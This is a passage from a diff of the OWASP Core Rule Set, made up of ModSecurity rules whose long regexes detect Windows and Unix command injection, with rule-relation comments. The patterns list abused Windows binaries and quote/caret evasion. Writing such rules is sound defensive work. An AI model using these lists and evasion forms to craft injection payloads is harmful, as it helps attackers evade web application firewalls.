m[\"\^]*(?:a[\"\^]*(?:k[\"\^]*e[\"\^]*c[\"\^]*a[\"\^]*b|n[\"\^]*a[\"\^]*g[\"\^]*e[\"\^]*-[\"\^]*b[\"\^]*d[\"\^]*e|v[\"\^]*i[\"\^]*n[\"\^]*j[\"\^]*e[\"\^]*c[\"\^]*t)|f[\"\^]*t[\"\^]*r[\"\^]*a[\"\^]*c[\"\^]*e|i[\"\^]*c[\"\^]*r[\"\^]*o[\"\^]*s[\"\^]*o[\"\^]*f[\"\^]*t|m[\"\^]*c|p[\"\^]*c[\"\^]*m[\"\^]*d[\"\^]*r[\"\^]*u[\"\^]*n|s[\"\^]*(?:(?:b[\"\^]*u[\"\^]*i[\"\^]*l|o[\"\^]*h[\"\^]*t[\"\^]*m[\"\^]*e)[\"\^]*d|c[\"\^]*o[\"\^]*n[\"\^]*f[\"\^]*i[\"\^]*g|d[\"\^]*(?:e[\"\^]*p[\"\^]*l[\"\^]*o[\"\^]*y|t)|h[\"\^]*t[\"\^]*(?:a|m[\"\^]*l)|i[\"\^]*e[\"\^]*x[\"\^]*e[\"\^]*c|p[\"\^]*u[\"\^]*b|x[\"\^]*s[\"\^]*l))|n[\"\^]*(?:e[\"\^]*t[\"\^]*s[\"\^]*h|t[\"\^]*d[\"\^]*s[\"\^]*u[\"\^]*t[\"\^]*i[\"\^]*l)|o[\"\^]*(?:d[\"\^]*b[\"\^]*c[\"\^]*c[\"\^]*o[\"\^]*n[\"\^]*f|f[\"\^]*f[\"\^]*l[\"\^]*i[\"\^]*n[\"\^]*e[\"\^]*s[\"\^]*c[\"\^]*a[\"\^]*n[\"\^]*n[\"\^]*e[\"\^]*r[\"\^]*s[\"\^]*h[\"\^]*e[\"\^]*l[\"\^]*l|n[\"\^]*e[\"\^]*d[\"\^]*r[\"\^]*i[\"\^]*v[\"\^]*e[\"\^]*s[\"\^]*t[\"\^]*a[\"\^]*n[\"\^]*d[\"\^]*a[\"\^]*l[\"\^]*o[\"\^]*n[\"\^]*e[\"\^]*u[\"\^]*p[\"\^]*d[\"\^]*a[\"\^]*t[\"\^]*e[\"\^]*r|p[\"\^]*e[\"\^]*n[\"\^]*c[\"\^]*o[\"\^]*n[\"\^]
*s[\"\^]*o[\"\^]*l[\"\^]*e)|p[\"\^]*(?:c[\"\^]*(?:a[\"\^]*l[\"\^]*u[\"\^]*a|w[\"\^]*(?:r[\"\^]*u[\"\^]*n|u[\"\^]*t[\"\^]*l))|(?:e[\"\^]*s[\"\^]*t[\"\^]*e|s)[\"\^]*r|(?:k[\"\^]*t[\"\^]*m[\"\^]*o|u[\"\^]*b[\"\^]*p[\"\^]*r)[\"\^]*n|n[\"\^]*p[\"\^]*u[\"\^]*t[\"\^]*i[\"\^]*l|o[\"\^]*w[\"\^]*e[\"\^]*r[\"\^]*p[\"\^]*n[\"\^]*t|r[\"\^]*(?:e[\"\^]*s[\"\^]*e[\"\^]*n[\"\^]*t[\"\^]*a[\"\^]*t[\"\^]*i[\"\^]*o[\"\^]*n[\"\^]*h[\"\^]*o[\"\^]*s[\"\^]*t|i[\"\^]*n[\"\^]*t(?:[\"\^]*b[\"\^]*r[\"\^]*m)?|o[\"\^]*(?:c[\"\^]*d[\"\^]*u[\"\^]*m[\"\^]*p|t[\"\^]*o[\"\^]*c[\"\^]*o[\"\^]*l[\"\^]*h[\"\^]*a[\"\^]*n[\"\^]*d[\"\^]*l[\"\^]*e[\"\^]*r)))|r[\"\^]*(?:a[\"\^]*s[\"\^]*a[\"\^]*u[\"\^]*t[\"\^]*o[\"\^]*u|c[\"\^]*s[\"\^]*i|(?:d[\"\^]*r[\"\^]*l[\"\^]*e[\"\^]*a[\"\^]*k[\"\^]*d[\"\^]*i[\"\^]*a|p[\"\^]*c[\"\^]*p[\"\^]*i[\"\^]*n)[\"\^]*g|e[\"\^]*(?:g(?:[\"\^]*(?:a[\"\^]*s[\"\^]*m|e[\"\^]*d[\"\^]*i[\"\^]*t|i[\"\^]*(?:n[\"\^]*i|s[\"\^]*t[\"\^]*e[\"\^]*r[\"\^]*-[\"\^]*c[\"\^]*i[\"\^]*m[\"\^]*p[\"\^]*r[\"\^]*o[\"\^]*v[\"\^]*i[\"\^]*d[\"\^]*e[\"\^]*r)|s[\"\^]*v[\"\^]*(?:c[\"\^]*s|r[\"\^]*3[\"\^]*2)))?|(?:m[\"\^]*o[\"\^]*t|p[\"\^]*l[\"\^]*a[\"\^]*c)[\"\^]*e)|u[\"\^]*n[\"\^]*(?:d[\"\^]*l[\"\^]*l[\"\^]*3[\"\^]*2|(?:e[\"\^]*x[\"\^]*e|s[\"\^]*c[\"\^]*r[\"\^]*i[\"\^]*p[\"\^]*t)[\"\^]*h[\"\^]*e[\"\^]*l[\"\^]*p[\"\^]*e[\"\^]*r|o[\"\^]*n[\"\^]*c[\"\^]*e))|s[\"\^]*(?:c[\"\^]*(?:[\s\v,\.-/;-<>].*|h[\"\^]*t[\"\^]*a[\"\^]*s[\"\^]*k[\"\^]*s|r[\"\^]*i[\"\^]*p[\"\^]*t[\"\^]*r[\"\^]*u[\"\^]*n[\"\^]*n[\"\^]*e[\"\^]*r)|e[\"\^]*t[\"\^]*(?:r[\"\^]*e[\"\^]*s|t[\"\^]*i[\"\^]*n[\"\^]*g[\"\^]*s[\"\^]*y[\"\^]*n[\"\^]*c[\"\^]*h[\"\^]*o[\"\^]*s[\"\^]*t|u[\"\^]*p[\"\^]*a[\"\^]*p[\"\^]*i)|h[\"\^]*(?:d[\"\^]*o[\"\^]*c[\"\^]*v[\"\^]*w|e[\"\^]*l[\"\^]*l[\"\^]*3[\"\^]*2)|q[\"\^]*(?:l[\"\^]*(?:d[\"\^]*u[\"\^]*m[\"\^]*p[\"\^]*e[\"\^]*r|(?:t[\"\^]*o[\"\^]*o[\"\^]*l[\"\^]*s[\"\^]*)?p[\"\^]*s)|u[\"\^]*i[\"\^]*r[\"\^]*r[\"\^]*e[\"\^]*l)|s[\"\^]*h|t[\"\^]*o[\"\^]*r[\"\^]*d[\"\^]*i[\"\^]*a[\"\^]*g|y[\"\^]*(?:n[\"\^]*c[\"\^]*a[\"\^]*p[\"\^]*p[\"\^]
*v[\"\^]*p[\"\^]*u[\"\^]*b[\"\^]*l[\"\^]*i[\"\^]*s[\"\^]*h[\"\^]*i[\"\^]*n[\"\^]*g[\"\^]*s[\"\^]*e[\"\^]*r[\"\^]*v[\"\^]*e[\"\^]*r|s[\"\^]*s[\"\^]*e[\"\^]*t[\"\^]*u[\"\^]*p))|t[\"\^]*(?:e[\"\^]*[\s\v,\.-/;-<>].*|r[\"\^]*a[\"\^]*c[\"\^]*k[\"\^]*e[\"\^]*r|t[\"\^]*(?:d[\"\^]*i[\"\^]*n[\"\^]*j[\"\^]*e[\"\^]*c[\"\^]*t|t[\"\^]*r[\"\^]*a[\"\^]*c[\"\^]*e[\"\^]*r))|u[\"\^]*(?:n[\"\^]*r[\"\^]*e[\"\^]*g[\"\^]*m[\"\^]*p[\"\^]*2|p[\"\^]*d[\"\^]*a[\"\^]*t[\"\^]*e|r[\"\^]*l|t[\"\^]*i[\"\^]*l[\"\^]*i[\"\^]*t[\"\^]*y[\"\^]*f[\"\^]*u[\"\^]*n[\"\^]*c[\"\^]*t[\"\^]*i[\"\^]*o[\"\^]*n[\"\^]*s)|v[\"\^]*(?:b[\"\^]*c|e[\"\^]*r[\"\^]*c[\"\^]*l[\"\^]*s[\"\^]*i[\"\^]*d|i[\"\^]*s[\"\^]*u[\"\^]*a[\"\^]*l[\"\^]*u[\"\^]*i[\"\^]*a[\"\^]*v[\"\^]*e[\"\^]*r[\"\^]*i[\"\^]*f[\"\^]*y[\"\^]*n[\"\^]*a[\"\^]*t[\"\^]*i[\"\^]*v[\"\^]*e|s[\"\^]*(?:i[\"\^]*i[\"\^]*s[\"\^]*e[\"\^]*x[\"\^]*e[\"\^]*l[\"\^]*a[\"\^]*u[\"\^]*n[\"\^]*c[\"\^]*h|j[\"\^]*i[\"\^]*t[\"\^]*d[\"\^]*e[\"\^]*b[\"\^]*u[\"\^]*g[\"\^]*g)[\"\^]*e[\"\^]*r)|w[\"\^]*(?:a[\"\^]*b|(?:f|m[\"\^]*i)[\"\^]*c|i[\"\^]*n[\"\^]*(?:g[\"\^]*e[\"\^]*t|r[\"\^]*m|w[\"\^]*o[\"\^]*r[\"\^]*d)|l[\"\^]*r[\"\^]*m[\"\^]*d[\"\^]*r|o[\"\^]*r[\"\^]*k[\"\^]*f[\"\^]*o[\"\^]*l[\"\^]*d[\"\^]*e[\"\^]*r[\"\^]*s|s[\"\^]*(?:(?:c[\"\^]*r[\"\^]*i[\"\^]*p|r[\"\^]*e[\"\^]*s[\"\^]*e)[\"\^]*t|l)|t[\"\^]*[\s\v,\.-/;-<>].*|u[\"\^]*a[\"\^]*u[\"\^]*c[\"\^]*l[\"\^]*t)|x[\"\^]*w[\"\^]*i[\"\^]*z[\"\^]*a[\"\^]*r[\"\^]*d|z[\"\^]*i[\"\^]*p[\"\^]*f[\"\^]*l[\"\^]*d[\"\^]*r)(?:\.[\"\^]*[0-9A-Z_a-z]+)?\b" \ + "id:932370,\ + phase:2,\ + block,\ + capture,\ + t:none,\ + msg:'Remote Command Execution: Windows Command Injection',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-shell',\ + tag:'platform-windows',\ + tag:'attack-rce',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/248/88',\ + tag:'PCI/6.5.2',\ + ver:'OWASP_CRS/4.0.0-rc2',\ + severity:'CRITICAL',\ + 
setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + +# +# This rule detects Windows shell command injections. +# If you are not running Windows, it is safe to disable this rule. +# +# New in CRSv4: The rules 932110 and 932115 were reorganized and renumbered to 932370 and 932380. +# The new rules target specific Windows binaries to simplify future updates of the command list. +# +# See rule 932370 above for further explanation. +# +# This rule is case-insensitive. +# +# Regular expression generated from regex-assembly/932380.ra. +# To update the regular expression run the following shell script +# (consult https://coreruleset.org/docs/development/regex_assembly/ for details): +# crs-toolchain regex update 932380 +# +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)(?:t[\"\^]*i[\"\^]*m[\"\^]*e|[\n\r;`\{]|\|\|?|&&?)[\s\v]*[\s\v\"'-\(,@]*(?:[\"'\.-9A-Z_a-z]+/|(?:[\"'\x5c\^]*[0-9A-Z_a-z][\"'\x5c\^]*:.*|[ 
\"'\.-9A-Z\x5c\^-_a-z]*)\x5c)?[\"\^]*(?:a[\"\^]*(?:s[\"\^]*s[\"\^]*o[\"\^]*c|t[\"\^]*(?:m[\"\^]*a[\"\^]*d[\"\^]*m|t[\"\^]*r[\"\^]*i[\"\^]*b)|u[\"\^]*(?:d[\"\^]*i[\"\^]*t[\"\^]*p[\"\^]*o[\"\^]*l|t[\"\^]*o[\"\^]*(?:c[\"\^]*(?:h[\"\^]*k|o[\"\^]*n[\"\^]*v)|(?:f[\"\^]*m|m[\"\^]*o[\"\^]*u[\"\^]*n)[\"\^]*t)))|b[\"\^]*(?:c[\"\^]*d[\"\^]*(?:b[\"\^]*o[\"\^]*o|e[\"\^]*d[\"\^]*i)[\"\^]*t|(?:d[\"\^]*e[\"\^]*h[\"\^]*d|o[\"\^]*o[\"\^]*t)[\"\^]*c[\"\^]*f[\"\^]*g|i[\"\^]*t[\"\^]*s[\"\^]*a[\"\^]*d[\"\^]*m[\"\^]*i[\"\^]*n)|c[\"\^]*(?:a[\"\^]*c[\"\^]*l[\"\^]*s|e[\"\^]*r[\"\^]*t[\"\^]*(?:r[\"\^]*e[\"\^]*q|u[\"\^]*t[\"\^]*i[\"\^]*l)|h[\"\^]*(?:c[\"\^]*p|d[\"\^]*i[\"\^]*r|g[\"\^]*(?:l[\"\^]*o[\"\^]*g[\"\^]*o[\"\^]*n|p[\"\^]*o[\"\^]*r[\"\^]*t|u[\"\^]*s[\"\^]*r)|k[\"\^]*(?:d[\"\^]*s[\"\^]*k|n[\"\^]*t[\"\^]*f[\"\^]*s))|l[\"\^]*e[\"\^]*a[\"\^]*n[\"\^]*m[\"\^]*g[\"\^]*r|m[\"\^]*(?:d(?:[\"\^]*k[\"\^]*e[\"\^]*y)?|s[\"\^]*t[\"\^]*p)|s[\"\^]*c[\"\^]*r[\"\^]*i[\"\^]*p[\"\^]*t)|d[\"\^]*(?:c[\"\^]*(?:d[\"\^]*i[\"\^]*a[\"\^]*g|g[\"\^]*p[\"\^]*o[\"\^]*f[\"\^]*i[\"\^]*x)|e[\"\^]*(?:f[\"\^]*r[\"\^]*a[\"\^]*g|l)|f[\"\^]*s[\"\^]*(?:d[\"\^]*i[\"\^]*a|r[\"\^]*m[\"\^]*i)[\"\^]*g|i[\"\^]*(?:a[\"\^]*n[\"\^]*t[\"\^]*z|r|s[\"\^]*(?:k[\"\^]*(?:c[\"\^]*o[\"\^]*(?:m[\"\^]*p|p[\"\^]*y)|p[\"\^]*(?:a[\"\^]*r[\"\^]*t|e[\"\^]*r[\"\^]*f)|r[\"\^]*a[\"\^]*i[\"\^]*d|s[\"\^]*h[\"\^]*a[\"\^]*d[\"\^]*o[\"\^]*w)|p[\"\^]*d[\"\^]*i[\"\^]*a[\"\^]*g))|n[\"\^]*s[\"\^]*c[\"\^]*m[\"\^]*d|(?:o[\"\^]*s[\"\^]*k[\"\^]*e|r[\"\^]*i[\"\^]*v[\"\^]*e[\"\^]*r[\"\^]*q[\"\^]*u[\"\^]*e[\"\^]*r)[\"\^]*y)|e[\"\^]*(?:n[\"\^]*d[\"\^]*l[\"\^]*o[\"\^]*c[\"\^]*a[\"\^]*l|v[\"\^]*e[\"\^]*n[\"\^]*t[\"\^]*c[\"\^]*r[\"\^]*e[\"\^]*a[\"\^]*t[\"\^]*e)|E[\"\^]*v[\"\^]*n[\"\^]*t[\"\^]*c[\"\^]*m[\"\^]*d|f[\"\^]*(?:c|i[\"\^]*(?:l[\"\^]*e[\"\^]*s[\"\^]*y[\"\^]*s[\"\^]*t[\"\^]*e[\"\^]*m[\"\^]*s|n[\"\^]*d[\"\^]*s[\"\^]*t[\"\^]*r)|l[\"\^]*a[\"\^]*t[\"\^]*t[\"\^]*e[\"\^]*m[\"\^]*p|o[\"\^]*r(?:[\"\^]*f[\"\^]*i[\"\^]*l[\"\^]*e[\"\^]*s)?|r[\"\^]*e[\"\^]*e[\"\^]*d[\"\^]*i[\"\
^]*s[\"\^]*k|s[\"\^]*u[\"\^]*t[\"\^]*i[\"\^]*l|(?:t[\"\^]*y[\"\^]*p|v[\"\^]*e[\"\^]*u[\"\^]*p[\"\^]*d[\"\^]*a[\"\^]*t)[\"\^]*e)|g[\"\^]*(?:e[\"\^]*t[\"\^]*(?:m[\"\^]*a[\"\^]*c|t[\"\^]*y[\"\^]*p[\"\^]*e)|o[\"\^]*t[\"\^]*o|p[\"\^]*(?:f[\"\^]*i[\"\^]*x[\"\^]*u[\"\^]*p|(?:r[\"\^]*e[\"\^]*s[\"\^]*u[\"\^]*l[\"\^]*)?t|u[\"\^]*p[\"\^]*d[\"\^]*a[\"\^]*t[\"\^]*e)|r[\"\^]*a[\"\^]*f[\"\^]*t[\"\^]*a[\"\^]*b[\"\^]*l)|h[\"\^]*(?:e[\"\^]*l[\"\^]*p[\"\^]*c[\"\^]*t[\"\^]*r|o[\"\^]*s[\"\^]*t[\"\^]*n[\"\^]*a[\"\^]*m[\"\^]*e)|i[\"\^]*(?:c[\"\^]*a[\"\^]*c[\"\^]*l[\"\^]*s|f|p[\"\^]*(?:c[\"\^]*o[\"\^]*n[\"\^]*f[\"\^]*i[\"\^]*g|x[\"\^]*r[\"\^]*o[\"\^]*u[\"\^]*t[\"\^]*e)|r[\"\^]*f[\"\^]*t[\"\^]*p)|j[\"\^]*e[\"\^]*t[\"\^]*p[\"\^]*a[\"\^]*c[\"\^]*k|k[\"\^]*(?:l[\"\^]*i[\"\^]*s[\"\^]*t|s[\"\^]*e[\"\^]*t[\"\^]*u[\"\^]*p|t[\"\^]*(?:m[\"\^]*u[\"\^]*t[\"\^]*i[\"\^]*l|p[\"\^]*a[\"\^]*s[\"\^]*s))|l[\"\^]*(?:o[\"\^]*(?:d[\"\^]*c[\"\^]*t[\"\^]*r|g[\"\^]*(?:m[\"\^]*a[\"\^]*n|o[\"\^]*f[\"\^]*f))|p[\"\^]*[q-r])|m[\"\^]*(?:a[\"\^]*(?:c[\"\^]*f[\"\^]*i[\"\^]*l[\"\^]*e|k[\"\^]*e[\"\^]*c[\"\^]*a[\"\^]*b|p[\"\^]*a[\"\^]*d[\"\^]*m[\"\^]*i[\"\^]*n)|k[\"\^]*(?:d[\"\^]*i[\"\^]*r|l[\"\^]*i[\"\^]*n[\"\^]*k)|m[\"\^]*c|o[\"\^]*u[\"\^]*n[\"\^]*t[\"\^]*v[\"\^]*o[\"\^]*l|q[\"\^]*(?:b[\"\^]*k[\"\^]*u[\"\^]*p|(?:t[\"\^]*g[\"\^]*)?s[\"\^]*v[\"\^]*c)|s[\"\^]*(?:d[\"\^]*t|i[\"\^]*(?:e[\"\^]*x[\"\^]*e[\"\^]*c|n[\"\^]*f[\"\^]*o[\"\^]*3[\"\^]*2)|t[\"\^]*s[\"\^]*c))|n[\"\^]*(?:b[\"\^]*t[\"\^]*s[\"\^]*t[\"\^]*a[\"\^]*t|e[\"\^]*t[\"\^]*(?:c[\"\^]*f[\"\^]*g|d[\"\^]*o[\"\^]*m|s[\"\^]*(?:h|t[\"\^]*a[\"\^]*t))|f[\"\^]*s[\"\^]*(?:a[\"\^]*d[\"\^]*m[\"\^]*i[\"\^]*n|s[\"\^]*(?:h[\"\^]*a[\"\^]*r[\"\^]*e|t[\"\^]*a[\"\^]*t))|l[\"\^]*(?:b[\"\^]*m[\"\^]*g[\"\^]*r|t[\"\^]*e[\"\^]*s[\"\^]*t)|s[\"\^]*l[\"\^]*o[\"\^]*o[\"\^]*k[\"\^]*u[\"\^]*p|t[\"\^]*(?:b[\"\^]*a[\"\^]*c[\"\^]*k[\"\^]*u[\"\^]*p|c[\"\^]*m[\"\^]*d[\"\^]*p[\"\^]*r[\"\^]*o[\"\^]*m[\"\^]*p[\"\^]*t|f[\"\^]*r[\"\^]*s[\"\^]*u[\"\^]*t[\"\^]*l))|o[\"\^]*(?:f[\"\^]*f[\"\^]*l[\"\^]*i[\"\^]*n[\
"\^]*e|p[\"\^]*e[\"\^]*n[\"\^]*f[\"\^]*i[\"\^]*l[\"\^]*e[\"\^]*s)|p[\"\^]*(?:a[\"\^]*(?:g[\"\^]*e[\"\^]*f[\"\^]*i[\"\^]*l[\"\^]*e[\"\^]*c[\"\^]*o[\"\^]*n[\"\^]*f[\"\^]*i|t[\"\^]*h[\"\^]*p[\"\^]*i[\"\^]*n)[\"\^]*g|(?:b[\"\^]*a[\"\^]*d[\"\^]*m[\"\^]*i|k[\"\^]*t[\"\^]*m[\"\^]*o)[\"\^]*n|e[\"\^]*(?:n[\"\^]*t[\"\^]*n[\"\^]*t|r[\"\^]*f[\"\^]*m[\"\^]*o[\"\^]*n)|n[\"\^]*p[\"\^]*u[\"\^]*(?:n[\"\^]*a[\"\^]*t[\"\^]*t[\"\^]*e[\"\^]*n[\"\^]*d|t[\"\^]*i[\"\^]*l)|o[\"\^]*(?:p[\"\^]*d|w[\"\^]*e[\"\^]*r[\"\^]*s[\"\^]*h[\"\^]*e[\"\^]*l[\"\^]*l)|r[\"\^]*n[\"\^]*(?:c[\"\^]*n[\"\^]*f[\"\^]*g|(?:d[\"\^]*r[\"\^]*v|m[\"\^]*n[\"\^]*g)[\"\^]*r|j[\"\^]*o[\"\^]*b[\"\^]*s|p[\"\^]*o[\"\^]*r[\"\^]*t|q[\"\^]*c[\"\^]*t[\"\^]*l)|u[\"\^]*(?:b[\"\^]*p[\"\^]*r[\"\^]*n|s[\"\^]*h[\"\^]*(?:d|p[\"\^]*r[\"\^]*i[\"\^]*n[\"\^]*t[\"\^]*e[\"\^]*r[\"\^]*c[\"\^]*o[\"\^]*n[\"\^]*n[\"\^]*e[\"\^]*c[\"\^]*t[\"\^]*i[\"\^]*o[\"\^]*n[\"\^]*s))|w[\"\^]*(?:l[\"\^]*a[\"\^]*u[\"\^]*n[\"\^]*c[\"\^]*h[\"\^]*e[\"\^]*r|s[\"\^]*h))|q[\"\^]*(?:a[\"\^]*p[\"\^]*p[\"\^]*s[\"\^]*r[\"\^]*v|p[\"\^]*r[\"\^]*o[\"\^]*c[\"\^]*e[\"\^]*s[\"\^]*s|u[\"\^]*s[\"\^]*e[\"\^]*r|w[\"\^]*i[\"\^]*n[\"\^]*s[\"\^]*t[\"\^]*a)|r[\"\^]*(?:d(?:[\"\^]*p[\"\^]*s[\"\^]*i[\"\^]*g[\"\^]*n)?|e[\"\^]*(?:f[\"\^]*s[\"\^]*u[\"\^]*t[\"\^]*i[\"\^]*l|g(?:[\"\^]*(?:i[\"\^]*n[\"\^]*i|s[\"\^]*v[\"\^]*r[\"\^]*3[\"\^]*2))?|l[\"\^]*o[\"\^]*g|(?:(?:p[\"\^]*a[\"\^]*d[\"\^]*m[\"\^]*i|s[\"\^]*c[\"\^]*a)[\"\^]*)?n|x[\"\^]*e[\"\^]*c)|i[\"\^]*s[\"\^]*e[\"\^]*t[\"\^]*u[\"\^]*p|m[\"\^]*d[\"\^]*i[\"\^]*r|o[\"\^]*b[\"\^]*o[\"\^]*c[\"\^]*o[\"\^]*p[\"\^]*y|p[\"\^]*c[\"\^]*(?:i[\"\^]*n[\"\^]*f[\"\^]*o|p[\"\^]*i[\"\^]*n[\"\^]*g)|s[\"\^]*h|u[\"\^]*n[\"\^]*d[\"\^]*l[\"\^]*l[\"\^]*3[\"\^]*2|w[\"\^]*i[\"\^]*n[\"\^]*s[\"\^]*t[\"\^]*a)|s[\"\^]*(?:a[\"\^]*n|c[\"\^]*(?:h[\"\^]*t[\"\^]*a[\"\^]*s[\"\^]*k[\"\^]*s|w[\"\^]*c[\"\^]*m[\"\^]*d)|e[\"\^]*(?:c[\"\^]*e[\"\^]*d[\"\^]*i[\"\^]*t|r[\"\^]*v[\"\^]*e[\"\^]*r[\"\^]*(?:(?:c[\"\^]*e[\"\^]*i[\"\^]*p|w[\"\^]*e[\"\^]*r)[\"\^]*o[\"\^]*p[\"\^]*t[\"\^]*i[\"\^
]*n|m[\"\^]*a[\"\^]*n[\"\^]*a[\"\^]*g[\"\^]*e[\"\^]*r[\"\^]*c[\"\^]*m[\"\^]*d)|t[\"\^]*x)|f[\"\^]*c|(?:h[\"\^]*o[\"\^]*w[\"\^]*m[\"\^]*o[\"\^]*u[\"\^]*n|u[\"\^]*b[\"\^]*s)[\"\^]*t|x[\"\^]*s[\"\^]*t[\"\^]*r[\"\^]*a[\"\^]*c[\"\^]*e|y[\"\^]*s[\"\^]*(?:o[\"\^]*c[\"\^]*m[\"\^]*g[\"\^]*r|t[\"\^]*e[\"\^]*m[\"\^]*i[\"\^]*n[\"\^]*f[\"\^]*o))|t[\"\^]*(?:a[\"\^]*(?:k[\"\^]*e[\"\^]*o[\"\^]*w[\"\^]*n|p[\"\^]*i[\"\^]*c[\"\^]*f[\"\^]*g|s[\"\^]*k[\"\^]*(?:k[\"\^]*i[\"\^]*l[\"\^]*l|l[\"\^]*i[\"\^]*s[\"\^]*t))|(?:c[\"\^]*m[\"\^]*s[\"\^]*e[\"\^]*t[\"\^]*u|f[\"\^]*t)[\"\^]*p|(?:(?:e[\"\^]*l[\"\^]*n[\"\^]*e|i[\"\^]*m[\"\^]*e[\"\^]*o[\"\^]*u)[\"\^]*|r[\"\^]*a[\"\^]*c[\"\^]*e[\"\^]*r[\"\^]*(?:p[\"\^]*)?)t|l[\"\^]*n[\"\^]*t[\"\^]*a[\"\^]*d[\"\^]*m[\"\^]*n|p[\"\^]*m[\"\^]*(?:t[\"\^]*o[\"\^]*o[\"\^]*l|v[\"\^]*s[\"\^]*c[\"\^]*m[\"\^]*g[\"\^]*r)|s[\"\^]*(?:(?:d[\"\^]*i[\"\^]*s[\"\^]*)?c[\"\^]*o[\"\^]*n|e[\"\^]*c[\"\^]*i[\"\^]*m[\"\^]*p|k[\"\^]*i[\"\^]*l[\"\^]*l|p[\"\^]*r[\"\^]*o[\"\^]*f)|y[\"\^]*p[\"\^]*e[\"\^]*p[\"\^]*e[\"\^]*r[\"\^]*f|z[\"\^]*u[\"\^]*t[\"\^]*i[\"\^]*l)|u[\"\^]*n[\"\^]*(?:e[\"\^]*x[\"\^]*p[\"\^]*o[\"\^]*s[\"\^]*e|i[\"\^]*q[\"\^]*u[\"\^]*e[\"\^]*i[\"\^]*d|l[\"\^]*o[\"\^]*d[\"\^]*c[\"\^]*t[\"\^]*r)|v[\"\^]*(?:o[\"\^]*l|s[\"\^]*s[\"\^]*a[\"\^]*d[\"\^]*m[\"\^]*i[\"\^]*n)|w[\"\^]*(?:a[\"\^]*i[\"\^]*t[\"\^]*f[\"\^]*o[\"\^]*r|b[\"\^]*a[\"\^]*d[\"\^]*m[\"\^]*i[\"\^]*n|(?:d[\"\^]*s|e[\"\^]*(?:c|v[\"\^]*t))[\"\^]*u[\"\^]*t[\"\^]*i[\"\^]*l|h[\"\^]*(?:e[\"\^]*r[\"\^]*e|o[\"\^]*a[\"\^]*m[\"\^]*i)|i[\"\^]*n[\"\^]*(?:n[\"\^]*t(?:[\"\^]*3[\"\^]*2)?|r[\"\^]*s)|m[\"\^]*i[\"\^]*c|s[\"\^]*c[\"\^]*r[\"\^]*i[\"\^]*p[\"\^]*t)|x[\"\^]*c[\"\^]*o[\"\^]*p[\"\^]*y)(?:\.[\"\^]*[0-9A-Z_a-z]+)?\b" \ + "id:932380,\ + phase:2,\ + block,\ + capture,\ + t:none,\ + msg:'Remote Command Execution: Windows Command Injection',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-shell',\ + tag:'platform-windows',\ + tag:'attack-rce',\ + 
tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/248/88',\ + tag:'PCI/6.5.2',\ + ver:'OWASP_CRS/4.0.0-rc2',\ + severity:'CRITICAL',\ + setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + + +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:932013,phase:1,pass,nolog,skipAfter:END-REQUEST-932-APPLICATION-ATTACK-RCE" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:932014,phase:2,pass,nolog,skipAfter:END-REQUEST-932-APPLICATION-ATTACK-RCE" +# +# -= Paranoia Level 2 =- (apply only when tx.detection_paranoia_level is sufficiently high: 2 or higher) +# + +# [ Unix command injection ] +# +# This rule targets pefix + the source command (dot character) at PL2. +# +# Rule relations: +# +# .932230 (base rule, PL1, targets prefix + two and three character commands) +# ..932231 (stricter sibling, PL2, targets prefix + the source shortcut command) +# ..932232 (stricter sibling, PL3, targets prefix + additional command words) +# .932235 (base rule, PL1, targets prefix + known command word of length > 3 without evasion) +# +# .932250 (base rule, PL1, targets two and three character commands) +# .932260 (base rule, PL1, targets known command word of length > 3 without evasion) +# +# .932240 (generic detection, PL2, targets generic evasion attempts) +# .932236 (stricter sibling of 932230, 932235, 932250, 932260, PL2, +# - with and without prefix +# - words of any length) +# ..932239 (sibling of 932236, PL2, +# - with and without prefix +# - words of any length +# - targets request headers user-agent and referer only +# - excluded words: known user-agents) +# ..932238 (stricter sibling of 932236, PL3, +# - no excluded words) +# .932237 (stricter sibling of 932230, 932235, 932250, 932260, PL3, +# - targets request headers user-agent and referer only +# - without prefix +# - with word boundaries +# - words of any length +# - excluded words: known user-agents) +# +# +# Regular expression generated 
from regex-assembly/932231.ra. +# To update the regular expression run the following shell script +# (consult https://coreruleset.org/docs/development/regex_assembly/ for details): +# crs-toolchain regex update 932231 +# +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?:t[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?i[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?m[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?e|[\n\r;`\{]|\|\|?|&&?|\$(?:\(\(?|\{)|[<>]\(|\([\s\v]*\))[\s\v]*(?:[\$\{]|(?:[\s\v]*\(|!)[\s\v]*|[0-9A-Z_a-z]+=(?:[^\s\v]*|\$(?:.*|.*)|[<>].*|'.*'|\".*\")[\s\v]+)*[\s\v]*[\"']*(?:[\"'-\+\--9\?A-\]_a-z\|]+/)?[\"'\x5c]*\.[\s\v].*\b" \ + "id:932231,\ + phase:2,\ + block,\ + capture,\ + t:none,\ + msg:'Remote Command Execution: Unix Command Injection',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-shell',\ + tag:'platform-unix',\ + tag:'attack-rce',\ + tag:'paranoia-level/2',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/248/88',\ + 